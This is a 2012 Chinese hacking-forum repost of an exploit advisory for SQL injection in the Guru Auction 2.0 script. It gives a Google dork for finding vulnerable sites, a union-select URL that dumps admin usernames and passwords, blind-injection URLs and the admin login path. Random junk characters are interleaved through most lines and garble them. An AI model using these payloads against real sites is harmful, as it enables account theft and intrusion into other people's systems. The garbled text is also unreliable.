找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2227|回复: 0
打印 上一主题 下一主题

Guru Auction 2.0多重sql注射

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-31 09:24:05 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
Guru Auction 2.0 Multiple SQL Injection Vulnerabilities
4 K0 B. \$ _4 ?0 |$ z) A$ D  t
- U* u& y2 q; y. w作者     : v3n0m% W: v9 @  `# g: G
应用 : Guru Auction 2.0. {: G2 V4 x- V* N9 H. ?" }2 }
Price       : $49/ G4 c7 P1 T: N( }3 m* K
Vendor      : http://www.guruscript.com/! B6 w6 [9 c4 n" R/ r. H+ [7 |, `" K
Google Dork : inurl:subcat.php?cate_id=
+ D) _  M3 z0 R3 h ; B& H+ F. s4 X" k  p
SQLi p0c:3 U: P  r* s* @! O/ w% Z
~~~~~~~~~~" N6 ^$ w; w: N8 j; ?; [$ F
http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--
- L% w# X" \6 ?$ V( C# w$ ]
0 c$ F/ p+ t$ R4 { 7 D( E1 }1 V9 ~: a
盲注 p0c:( d% ^- w8 ?0 B: `3 n
~~~~~~~~~~- {% g; p# M2 s1 ^# @
http://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
% m) W- ], W6 m8 U5 H0 J! o+ ?2 Dhttp://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false0 [4 T4 Z! k/ g5 k3 N
% o% S) t+ H. l; j* b9 T
管理登录入口:" Z. g( M6 ~* p% Y; U
~~~~~~~~~~
6 E; N: I% j( jhttp://domain.tld/[path]/admin/) y, t' f6 y% c+ _
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表